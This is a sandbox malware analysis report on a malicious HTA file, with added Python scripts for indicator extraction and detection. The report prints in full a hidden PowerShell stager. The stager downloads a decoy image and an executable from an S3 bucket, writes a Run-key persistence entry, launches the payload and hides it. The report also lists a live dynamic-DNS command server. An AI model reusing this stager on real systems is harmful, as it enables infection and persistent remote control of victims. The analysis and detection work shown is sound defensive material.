MSHTAPayloadawalobina.hta

Full analysis: https://app.any.run/tasks/3ded9aa6-72fb-42bb-9dcb-6313dc3359fa
Verdict: Malicious activity
Analysis date: January 10, 2019, 19:41:59
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: autoit
MIME: text/html
File info: HTML document, ASCII text, with very long lines, with CRLF line terminators
MD5: 966AB78B142D9AAED55E86E26AD73887
SHA1: 4453F3838CE737F8E7B62545A1A970F21C4A397E
SHA256: 3486A83F7060F11655B744238DE048E7D9F6E9F41E73FC0635CEF356DB12BE31
SSDEEP: 96:wBvaY1zUMd6VfRjF/Vaqk8k236yOXOuJWksRRzMo:wb1zUrbfaIk+pU6xRRzP

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS
    • Changes the autorun value in the registry
      • powershell.exe (PID: 3716)
      • lwh.exe (PID: 2736)
    • Application was dropped or rewritten from another process
      • lwh.exe (PID: 3768)
      • lwh.exe (PID: 2736)
      • WfFyPbj.exe (PID: 2632)
  • SUSPICIOUS
    • Creates files in the user directory
      • powershell.exe (PID: 3716)
    • Executable content was dropped or overwritten
      • powershell.exe (PID: 3716)
      • WfFyPbj.exe (PID: 2632)
    • Executes PowerShell scripts
      • iexplore.exe (PID: 3440)
    • Uses ATTRIB.EXE to modify file attributes
      • powershell.exe (PID: 3716)
    • Application launched itself
      • lwh.exe (PID: 3768)
    • Drop AutoIt3 executable file
      • WfFyPbj.exe (PID: 2632)
    • Connects to unusual port
      • RegSvcs.exe (PID: 1144)
  • INFO
    • Changes internet zones settings
      • iexplore.exe (PID: 3000)
    • Reads internet explorer settings
      • iexplore.exe (PID: 3440)
    • Application launched itself
      • iexplore.exe (PID: 3000)
    • Reads Internet Cache Settings
      • iexplore.exe (PID: 3440)
    • Dropped object may contain Bitcoin addresses
      • WfFyPbj.exe (PID: 2632)
      • lwh.exe (PID: 3768)
    • Creates files in the user directory
      • iexplore.exe (PID: 3000)
Find more information about signature artifacts and their mapping to the MITRE ATT&CK™ matrix in the full report.
No Malware configuration.

TRiD: .html | HyperText Markup Language (100)
EXIF (HTML): ContentType: text/html; charset=utf-8
All screenshots are available in the full report
Total processes: 41
Monitored processes: 9
Malicious processes: 5
Suspicious processes: 1

Behavior graph

(Figure, not reproduced. Nodes as drawn: iexplore.exe, iexplore.exe, powershell.exe, PhotoViewer.dll, wffypbj.exe, attrib.exe, lwh.exe, lwh.exe, regsvcs.exe, joined by "start" and "drop and start" edges. The parent/child relationships are listed under Process information below.)

Process information

PID: 3000
CMD: "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\admin\AppData\Local\Temp\MSHTAPayloadawalobina.hta.html
Path: C:\Program Files\Internet Explorer\iexplore.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Internet Explorer
Exit code: 1
Version: 8.00.7600.16385 (win7_rtm.090713-1255)

PID: 3440
CMD: "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3000 CREDAT:79873
Path: C:\Program Files\Internet Explorer\iexplore.exe
Parent process: iexplore.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Internet Explorer
Exit code: 0
Version: 8.00.7600.16385 (win7_rtm.090713-1255)

PID: 3716
CMD (a single command line in the original; wrapped here at statement boundaries and indented):
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -WindowStyle hidden -nologo
$osCheckMajor = [System.Environment]::OSVersion.Version | Select -Expand Major;
$osCheckMinor = [System.Environment]::OSVersion.Version | Select -Expand Minor;
$osVersion = "$osCheckMajor" + '.' + "$osCheckMinor";
$poshVersion = $PSVersionTable.PSVersion.Major;
if($poshVersion -eq 2){
    $randomInt = Get-Random -Minimum 5 -Maximum 10;
    $randomStr = -join ((65..90) + (97..122) | Get-Random -Count $randomInt | % {[char]$_});
    $peName = $randomStr + '.exe';
    $savePath = "$env:APPDATA" + '\' + "$peName";
    $decoyName = "$randomStr" + '.jpg';
    $decoyURL = 'https://s3-ap-southeast-1.amazonaws.com/bnmmj/guru.jpg';
    $decoyPath = "$env:APPDATA" + '\' + "$decoyName";
    $webClient = New-Object System.Net.WebClient;
    $webDownload = $webClient.DownloadFile($decoyURL, $decoyPath);
    Start-Process $decoyPath;
    Start-Sleep -s 7;
    New-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RUN" -Name $randomStr -Value $savePath -Force;;
    $peDirectURL = 'https://s3-ap-southeast-1.amazonaws.com/bnmmj/awaobinna.exe';
    $webClient = New-Object System.Net.WebClient;
    $webDownload = $webClient.DownloadFile($peDirectURL, $savePath)
}elseif($poshVersion -ge 3){
    $randomInt = Get-Random -Minimum 5 -Maximum 10;
    $randomStr = -join ((65..90) + (97..122) | Get-Random -Count $randomInt | % {[char]$_});
    $peName = $randomStr + '.exe';
    $savePath = "$env:APPDATA" + '\' + "$peName";
    $decoyName = "$randomStr" + '.jpg';
    $decoyURL = 'https://s3-ap-southeast-1.amazonaws.com/bnmmj/guru.jpg';
    $decoyPath = "$env:APPDATA" + '\' + "$decoyName";
    Invoke-WebRequest -Uri $decoyURL -OutFile $decoyPath;
    Start-Process $decoyPath;
    Start-Sleep -s 7;
    New-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RUN" -Name $randomStr -Value $savePath -Force;;
    $peDirectURL = 'https://s3-ap-southeast-1.amazonaws.com/bnmmj/awaobinna.exe';
    Invoke-WebRequest -Uri $peDirectURL -OutFile $savePath
};
Start-Process $savePath;
attrib +h +s $savePath;"
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: iexplore.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID: 2984
CMD: C:\Windows\system32\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}
Path: C:\Windows\system32\DllHost.exe
Parent process: svchost.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: COM Surrogate
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID: 2632
CMD: "C:\Users\admin\AppData\Roaming\WfFyPbj.exe"
Path: C:\Users\admin\AppData\Roaming\WfFyPbj.exe
Parent process: powershell.exe
User: admin
Integrity Level: MEDIUM
Exit code: 0
Company, Description, Version: not present

PID: 3132
CMD: "C:\Windows\system32\attrib.exe" +h +s C:\Users\admin\AppData\Roaming\WfFyPbj.exe
Path: C:\Windows\system32\attrib.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Attribute Utility
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID: 3768
CMD: "C:\Users\admin\AppData\Local\Temp\88465914\lwh.exe" fld=ktl
Path: C:\Users\admin\AppData\Local\Temp\88465914\lwh.exe
Parent process: WfFyPbj.exe
User: admin
Company: AutoIt Team
Integrity Level: MEDIUM
Description: AutoIt v3 Script
Exit code: 0
Version: 3, 3, 14, 5

PID: 2736
CMD: C:\Users\admin\AppData\Local\Temp\88465914\lwh.exe C:\Users\admin\AppData\Local\Temp\88465914\VTOCI
Path: C:\Users\admin\AppData\Local\Temp\88465914\lwh.exe
Parent process: lwh.exe
User: admin
Company: AutoIt Team
Integrity Level: MEDIUM
Description: AutoIt v3 Script
Exit code: 0
Version: 3, 3, 14, 5

PID: 1144
CMD: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Parent process: lwh.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft .NET Services Installation Utility
Version: 4.6.1055.0 built by: NETFXREL2
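The command line of PID 3716 and the parent/child chain in the table above are what a detection engineer would turn into rules. The following is an added example written for this page, not code from ANY.RUN or from the sample: it extracts the static indicators from the recorded PowerShell command line (URLs, the Run key, the download primitives, the attrib call) and applies process-chain rules to the records transcribed from the table. The rule lists (script hosts, document parents, .NET utilities) and the finding texts are assumptions; mshta.exe is included as a parent because the sample ran here as a renamed .hta.html under iexplore.exe, while the same file opened with its .hta extension would run under mshta.exe.

```python
import re

# Command line of PID 3716 as recorded in the Process information table above.
# Line breaks were inserted after statement separators only; the original is one line.
STAGER_CMDLINE = r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -WindowStyle hidden -nologo $osCheckMajor = [System.Environment]::OSVersion.Version | Select -Expand Major;
$osCheckMinor = [System.Environment]::OSVersion.Version | Select -Expand Minor;$osVersion = "$osCheckMajor" + '.' + "$osCheckMinor";$poshVersion = $PSVersionTable.PSVersion.Major;
if($poshVersion -eq 2){$randomInt = Get-Random -Minimum 5 -Maximum 10;$randomStr = -join ((65..90) + (97..122) | Get-Random -Count $randomInt | % {[char]$_});
$peName = $randomStr + '.exe';$savePath = "$env:APPDATA" + '\' + "$peName";$decoyName = "$randomStr" + '.jpg';
$decoyURL = 'https://s3-ap-southeast-1.amazonaws.com/bnmmj/guru.jpg';$decoyPath = "$env:APPDATA" + '\' + "$decoyName";
$webClient = New-Object System.Net.WebClient;$webDownload = $webClient.DownloadFile($decoyURL, $decoyPath);Start-Process $decoyPath;Start-Sleep -s 7;
New-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RUN" -Name $randomStr -Value $savePath -Force;;
$peDirectURL = 'https://s3-ap-southeast-1.amazonaws.com/bnmmj/awaobinna.exe';$webClient = New-Object System.Net.WebClient;
$webDownload = $webClient.DownloadFile($peDirectURL, $savePath)}elseif($poshVersion -ge 3){$randomInt = Get-Random -Minimum 5 -Maximum 10;
$randomStr = -join ((65..90) + (97..122) | Get-Random -Count $randomInt | % {[char]$_});$peName = $randomStr + '.exe';
$savePath = "$env:APPDATA" + '\' + "$peName";$decoyName = "$randomStr" + '.jpg';
$decoyURL = 'https://s3-ap-southeast-1.amazonaws.com/bnmmj/guru.jpg';$decoyPath = "$env:APPDATA" + '\' + "$decoyName";
Invoke-WebRequest -Uri $decoyURL -OutFile $decoyPath;Start-Process $decoyPath;Start-Sleep -s 7;
New-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RUN" -Name $randomStr -Value $savePath -Force;;
$peDirectURL = 'https://s3-ap-southeast-1.amazonaws.com/bnmmj/awaobinna.exe';Invoke-WebRequest -Uri $peDirectURL -OutFile $savePath};
Start-Process $savePath;attrib +h +s $savePath;"'''

URL_RE = re.compile(r"https?://[^\s'\"<>]+")
RUN_KEY_RE = re.compile(r"HK(?:CU|LM):\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run(?:Once)?", re.I)
USER_WRITABLE_RE = re.compile(r"\\Users\\[^\\]+\\AppData\\", re.I)

def extract_iocs(cmdline):
    """Static indicators from a PowerShell stager command line; nothing is executed."""
    low = cmdline.lower()
    methods = [name for name, needle in (("WebClient.DownloadFile", ".downloadfile("),
                                         ("Invoke-WebRequest", "invoke-webrequest")) if needle in low]
    return {
        "urls": list(dict.fromkeys(URL_RE.findall(cmdline))),  # keep order, drop repeats
        "persistence_keys": list(dict.fromkeys(RUN_KEY_RE.findall(cmdline))),
        "download_methods": methods,
        "hidden_bypass": "-executionpolicy bypass" in low and "-windowstyle hidden" in low,
        "hides_payload": re.search(r"\battrib\s+\+h\s+\+s\b", low) is not None,
    }

IE = r"C:\Program Files\Internet Explorer\iexplore.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
DROPPER = r"C:\Users\admin\AppData\Roaming\WfFyPbj.exe"
LWH = r"C:\Users\admin\AppData\Local\Temp\88465914\lwh.exe"
REGSVCS = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

# (pid, image path, parent image name, command line), transcribed from the table above.
PROCESSES = [
    (3000, IE, "explorer.exe", f'"{IE}" C:\\Users\\admin\\AppData\\Local\\Temp\\MSHTAPayloadawalobina.hta.html'),
    (3440, IE, "iexplore.exe", f'"{IE}" SCODEF:3000 CREDAT:79873'),
    (3716, PS, "iexplore.exe", STAGER_CMDLINE),
    (2632, DROPPER, "powershell.exe", f'"{DROPPER}"'),
    (3132, r"C:\Windows\system32\attrib.exe", "powershell.exe", f'"C:\\Windows\\system32\\attrib.exe" +h +s {DROPPER}'),
    (3768, LWH, "WfFyPbj.exe", f'"{LWH}" fld=ktl'),
    (2736, LWH, "lwh.exe", f"{LWH} C:\\Users\\admin\\AppData\\Local\\Temp\\88465914\\VTOCI"),
    (1144, REGSVCS, "lwh.exe", f'"{REGSVCS}"'),
]

# Rule inputs below are assumptions to tune per environment, not data from the report.
SCRIPT_HOSTS = {"powershell.exe", "mshta.exe", "wscript.exe", "cscript.exe", "cmd.exe"}
# mshta.exe is listed as a parent because the sample ran here as a renamed .hta.html under
# iexplore.exe; opened with its .hta extension it would run under mshta.exe instead.
DOCUMENT_PARENTS = {"iexplore.exe", "mshta.exe", "winword.exe", "excel.exe", "outlook.exe"}
DOTNET_UTILITIES = {"regsvcs.exe", "regasm.exe", "installutil.exe", "msbuild.exe"}

def image_name(path):
    return path.rsplit("\\", 1)[-1].lower()

def triage(processes):
    """Apply host-level rules to each process record; returns {pid: [finding, ...]}."""
    path_of = {}
    for _, path, _, _ in processes:  # the table names parents only, so resolve their paths
        path_of.setdefault(image_name(path), path)
    findings = {}
    for pid, path, parent, cmd in processes:
        name, parent, hits = image_name(path), parent.lower(), []
        if name in SCRIPT_HOSTS and parent in DOCUMENT_PARENTS:
            hits.append(f"{name} spawned by {parent}")
        if name == "powershell.exe":
            iocs = extract_iocs(cmd)
            if iocs["hidden_bypass"]:
                hits.append("hidden window with execution policy bypass")
            if iocs["persistence_keys"]:
                hits.append("Run key persistence written from the command line")
            if iocs["download_methods"]:
                hits.append("download cradle: " + ", ".join(iocs["download_methods"]))
        if USER_WRITABLE_RE.search(path):
            hits.append("executable running from a user-writable AppData path")
        if name == "attrib.exe" and "+h" in cmd and "+s" in cmd and USER_WRITABLE_RE.search(cmd):
            hits.append("hidden+system attributes set on an AppData file")
        if name in DOTNET_UTILITIES and USER_WRITABLE_RE.search(path_of.get(parent, "")):
            hits.append(f"{name} launched by {parent}, which runs from AppData")
        findings[pid] = hits
    return findings

if __name__ == "__main__":
    print(extract_iocs(STAGER_CMDLINE))
    print(triage(PROCESSES))
```

The two URLs, the HKCU Run key and the attrib call come straight out of the command line without running anything, which is the point: the stager randomises the file name at run time, so the stable indicators are the S3 URLs and the behaviour, not the dropped file name (here WfFyPbj.exe, with the decoy saved beside it as WfFyPbj.jpg, as the Dropped files table below shows).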
Total events: 1,767
Read events: 1,608
Write events: 0
Delete events: 0
Modification events: no data
Executable files: 2
Suspicious files: 4
Text files: 53
Unknown types: 1

Dropped files

PID 3000 (iexplore.exe): C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RB73MZ6Y\favicon[1].ico
  Type, MD5, SHA256: not listed

PID 3000 (iexplore.exe): C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
  Type, MD5, SHA256: not listed

PID 3716 (powershell.exe): C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\84U14WF1C1GOHJU9ZFQS.temp
  Type, MD5, SHA256: not listed

PID 2632 (WfFyPbj.exe): C:\Users\admin\AppData\Local\Temp\88465914\ibw.mp4
  Type: text
  MD5: 7CBA224E33403861F74573F8464D3D2F
  SHA256: AD912169922C0F25F333CF4235429B63C567E349080A4CB6C78F2F49F8279F7E

PID 3716 (powershell.exe): C:\Users\admin\AppData\Roaming\WfFyPbj.jpg
  Type: image
  MD5: 38C3261D8E98A3BBBCFAFF8C259A9DDE
  SHA256: 98F6E62ABC7A08FF41584696CF46DA99C86C3EEF95D1CF3BF6262054E71E4E74

PID 2632 (WfFyPbj.exe): C:\Users\admin\AppData\Local\Temp\88465914\idn.docx
  Type: text
  MD5: B0341DF38A4783109002AB4CF33C9D55
  SHA256: C2073FFEBE269E494A467760438C9F2A34C109584965555E4A5FFE2FEBEB4858

PID 3440 (iexplore.exe): C:\Users\admin\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012019011020190111\index.dat
  Type: dat
  MD5: CBA4D69DFFAFA00DB6B321A46491D5EF
  SHA256: AC378E39A16B3E8A1B83485D3563C690EF744D9C2B3428FD3D187BF15E561A97

PID 2632 (WfFyPbj.exe): C:\Users\admin\AppData\Local\Temp\88465914\jxn.txt
  Type: text
  MD5: 11D8800A15EBDB99487EDEBC06EF86E8
  SHA256: 7E63EF6F2A78B51AD2915D0CA50D0B0D0420600BA8F4A99EE6CDAE3AC7868A99

PID 2632 (WfFyPbj.exe): C:\Users\admin\AppData\Local\Temp\88465914\emu.mp3
  Type: text
  MD5: 5709F32A91FE4FD8DB720BCABD3546D1
  SHA256: C9992EB858B214114AEF5F2BDFAE725920E4550A4B8E77301144D9363E3F9760

PID 2632 (WfFyPbj.exe): C:\Users\admin\AppData\Local\Temp\88465914\dwa.icm
  Type: text
  MD5: 3A5452C2AF12FB5F972F8FF46C91888C
  SHA256: CB857B22E73625770E18EC4029DA260E7F99F4738E847B16B5EAA56D294F687B
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 1
TCP/UDP connections: 15
DNS requests: 8
Threats: 0

HTTP requests

PID   Process       Method  HTTP Code  IP                URL                              CN  Type   Size   Reputation
3000  iexplore.exe  GET     200        13.107.21.200:80  http://www.bing.com/favicon.ico  US  image  237 b  whitelisted

Connections

PID   Process         IP:port             Domain                           ASN                    CN  Reputation
3000  iexplore.exe    13.107.21.200:80    www.bing.com                     Microsoft Corporation  US  whitelisted
3716  powershell.exe  52.219.32.73:443    s3-ap-southeast-1.amazonaws.com  Amazon.com, Inc.       SG  unknown
1144  RegSvcs.exe     45.249.90.124:1609  idea1com2002.duckdns.org         Korea Telecom          KR  malicious

DNS requests

Domain                           IP(s)                          Reputation
www.bing.com                     13.107.21.200, 204.79.197.200  whitelisted
s3-ap-southeast-1.amazonaws.com  52.219.32.73                   shared
idea1com2002.duckdns.org         45.249.90.124                  malicious
dns.msftncsi.com                 131.107.255.255                shared

Threats

Class          Message
Misc activity  ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
(The same alert is listed four times; the PID and Process columns are empty in the report.)
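Taken together, the Connections, DNS and Threats tables show the pattern a network-side rule needs: a .NET utility (RegSvcs.exe) that has no reason to open a socket, talking to a dynamic-DNS name on an unusual port, after a script host pulled its payload from public object storage. The following is an added example written for this page, not code from ANY.RUN or from any IDS, that applies those checks to the rows transcribed from the Connections table. The suffix lists, the port baseline and the list of binaries that should never open sockets are assumptions to be tuned per environment; the dynamic-DNS check mirrors what the ET INFO DYNAMIC_DNS rule flagged above.

```python
# Network records from the Connections table above: (pid, process, remote IP, remote port, domain).
CONNECTIONS = [
    (3000, "iexplore.exe", "13.107.21.200", 80, "www.bing.com"),
    (3716, "powershell.exe", "52.219.32.73", 443, "s3-ap-southeast-1.amazonaws.com"),
    (1144, "RegSvcs.exe", "45.249.90.124", 1609, "idea1com2002.duckdns.org"),
]

# The lists below are assumptions to tune per environment, not data from the report.
DYNAMIC_DNS_SUFFIXES = ("duckdns.org", "no-ip.com", "ddns.net", "hopto.org", "zapto.org", "dynu.com")
PUBLIC_STORAGE_SUFFIXES = ("amazonaws.com", "blob.core.windows.net", "storage.googleapis.com")
SCRIPT_HOSTS = {"powershell.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
NO_NETWORK_EXPECTED = {"regsvcs.exe", "regasm.exe", "installutil.exe", "attrib.exe"}
COMMON_PORTS = {80, 443}


def has_suffix(domain, suffixes):
    """True if domain equals or is a subdomain of any suffix (no plain substring matching)."""
    d = domain.lower().rstrip(".")
    return any(d == s or d.endswith("." + s) for s in suffixes)


def assess(connections):
    """Returns ({pid: [(severity, finding), ...]}, [(domain, "ip:port"), ...]).

    The second element lists only connections that carry a high-severity finding,
    so a shared cloud endpoint such as the S3 hostname is reported but not
    proposed for blocking."""
    findings, block = {}, []
    for pid, proc, ip, port, domain in connections:
        name, hits = proc.lower(), []
        if has_suffix(domain, DYNAMIC_DNS_SUFFIXES):
            hits.append(("high", f"dynamic DNS domain {domain}"))
        if name in NO_NETWORK_EXPECTED:
            hits.append(("high", f"{proc} is not expected to open network connections"))
        if port not in COMMON_PORTS:
            hits.append(("medium", f"non-standard port {port}"))
        if name in SCRIPT_HOSTS and has_suffix(domain, PUBLIC_STORAGE_SUFFIXES):
            hits.append(("low", f"{proc} fetching from public object storage {domain}"))
        findings[pid] = hits
        if any(sev == "high" for sev, _ in hits):
            block.append((domain, f"{ip}:{port}"))
    return findings, block


if __name__ == "__main__":
    found, block = assess(CONNECTIONS)
    for pid, hits in found.items():
        for sev, msg in hits:
            print(f"PID {pid} [{sev}] {msg}")
    print("block:", block)
```

Run against the three rows, only the RegSvcs.exe connection to idea1com2002.duckdns.org:1609 reaches the block list; the PowerShell download from S3 is surfaced at low severity because the same hostname serves legitimate buckets in that region, and the Bing favicon fetch from iexplore.exe produces nothing.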
No debug info